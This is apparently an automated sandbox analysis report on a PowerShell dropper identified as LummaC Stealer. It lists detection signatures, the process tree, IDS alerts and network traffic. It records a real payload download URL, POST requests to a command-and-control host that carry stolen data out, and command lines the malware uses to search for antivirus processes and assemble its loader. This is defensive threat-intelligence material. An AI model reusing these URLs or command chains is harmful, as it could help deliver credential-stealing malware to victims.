Edit tour

Windows Analysis Report
pennicle.txt.ps1

Overview

General Information

Sample name:	pennicle.txt.ps1
Analysis ID:	1557470
MD5:	56b5ba0c22514be73f715832d8c2c9c7
SHA1:	b58f8034ce283cee1e514e80bc76026f133565e7
SHA256:	b0879918c9bcb34665ea7471f7ce87c6ed49a032f364ccd2ae279886a2bbd96e
Tags:	FakeCaptchaps1user-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected ZipBomb

AI detected suspicious sample

Drops PE files with a suspicious file extension

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses an obfuscated file name to hide its real file extension (double extension)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SolPen.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe" MD5: 3F743B632A0A52E5D8BA262C13134B17)

cmd.exe (PID: 8092 cmdline: "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8164 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 8172 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 1104 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7340 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1968 cmdline: cmd /c md 701961 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 2260 cmdline: findstr /V "CigaretteSmallPlatesCalgary" Tits MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5560 cmdline: cmd /c copy /b ..\Relationship + ..\Playing + ..\Closely + ..\Reducing + ..\Inventory + ..\Kingdom + ..\Suppose j MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Puts.com (PID: 1080 cmdline: Puts.com j MD5: 78BA0653A340BAC5FF152B21A83626CC)

choice.exe (PID: 6996 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\pkg3.zip	JoeSecurity_ZipBomb	Yara detected ZipBomb	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe" , ParentImage: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe, ParentProcessId: 8040, ParentProcessName: SolPen.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd, ProcessId: 8092, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\pennicle.txt.ps1", ProcessId: 7780, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Battle Battle.cmd & Battle.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7340, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T09:58:54.899617+0100	2028371	3	Unknown Traffic	192.168.2.11	49972	172.67.128.233	443	TCP
2024-11-18T09:58:56.233256+0100	2028371	3	Unknown Traffic	192.168.2.11	49973	172.67.128.233	443	TCP
2024-11-18T09:58:57.473229+0100	2028371	3	Unknown Traffic	192.168.2.11	49974	172.67.128.233	443	TCP
2024-11-18T09:59:00.059340+0100	2028371	3	Unknown Traffic	192.168.2.11	49975	172.67.128.233	443	TCP
2024-11-18T09:59:01.773999+0100	2028371	3	Unknown Traffic	192.168.2.11	49976	172.67.128.233	443	TCP
2024-11-18T09:59:03.689330+0100	2028371	3	Unknown Traffic	192.168.2.11	49978	172.67.128.233	443	TCP
2024-11-18T09:59:05.189814+0100	2028371	3	Unknown Traffic	192.168.2.11	49979	172.67.128.233	443	TCP
2024-11-18T09:59:07.692257+0100	2028371	3	Unknown Traffic	192.168.2.11	49980	172.67.128.233	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T09:58:55.541203+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49972	172.67.128.233	443	TCP
2024-11-18T09:58:56.725128+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49973	172.67.128.233	443	TCP
2024-11-18T09:59:08.525851+0100	2054653	1	A Network Trojan was detected	192.168.2.11	49980	172.67.128.233	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T09:58:55.541203+0100	2049836	1	A Network Trojan was detected	192.168.2.11	49972	172.67.128.233	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T09:58:56.725128+0100	2049812	1	A Network Trojan was detected	192.168.2.11	49973	172.67.128.233	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T09:59:04.199213+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.11	49978	172.67.128.233	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://storageinstance.oss-ap-southeast-1.aliyuncs.com/link/process/SolPen.zip	Avira URL Cloud: Label: malware
Source: https://storageinstance.oss-ap-southeast-1.aliyuncs.com	Avira URL Cloud: Label: malware
Source: http://storageinstance.oss-ap-southeast-1.aliyuncs.com	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: unknown	HTTPS traffic detected: 47.79.48.182:443 -> 192.168.2.11:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.233:443 -> 192.168.2.11:49980 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_004062D5 FindFirstFileW,FindClose,	3_2_004062D5
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_00402E18 FindFirstFileW,	3_2_00402E18
Source: C:\Users\user\AppData\Roaming\Extracted3\SolPen.exe	Code function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00406C9B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49978 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49973 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49972 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49973 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49972 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49980 -> 172.67.128.233:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49973 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49974 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49978 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49976 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49972 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49979 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49980 -> 172.67.128.233:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49975 -> 172.67.128.233:443

Source: global traffic	HTTP traffic detected: GET /link/process/SolPen.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: storageinstance.oss-ap-southeast-1.aliyuncs.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5806PKAGM4JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WWXV4CGO4DECPDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15035Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=S1Q841TZIDHGNQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20404Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74YTBCXBVCL56User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1206Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XNLZ9CST38PLZJKEF2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587009Host: battle-curbe.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: battle-curbe.cyou

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /link/process/SolPen.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: storageinstance.oss-ap-southeast-1.aliyuncs.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: storageinstance.oss-ap-southeast-1.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: QbeMCwQrsKPS.QbeMCwQrsKPS
Source: global traffic	DNS traffic detected: DNS query: battle-curbe.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: battle-curbe.cyou

Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SolPen.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SolPen.exe, 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmp, SolPen.exe, 00000003.00000000.1396087585.0000000000408000.00000002.00000001.01000000.00000008.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000000.00000002.1466706779.000001D590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1444500671.000001D580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, SolPen.exe, 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000000.00000002.1444500671.000001D581AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://storageinstance.oss-ap-southeast-1.aliyuncs.com
Source: powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SolPen.exe, 00000003.00000003.1408125240.000000000288A000.00000004.00000020.00020000.00000000.sdmp, Puts.com, 0000000D.00000000.1446610400.0000000000255000.00000002.00000001.01000000.0000000A.sdmp, Solution.3.dr, Puts.com.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: powershell.exe, 00000000.00000002.1444500671.000001D581ADC000.00000004.00000800.00020000.00000000.sdmp, SolPen.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000000.00000002.1444500671.000001D580001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1444500671.000001D581632000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1466706779.000001D590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1466706779.000001D5901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1444500671.000001D581632000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://storageinstance.oss-ap-southeast-1.aliyuncs.com
Source: powershell.exe, 00000000.00000002.1444500671.000001D580232000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1444500671.000001D581632000.00000004.00000800.00020000.00000000.sdmp, pennicle.txt.ps1	String found in binary or memory: https://storageinstance.oss-ap-southeast-1.aliyuncs.com/link/process/SolPen.zip
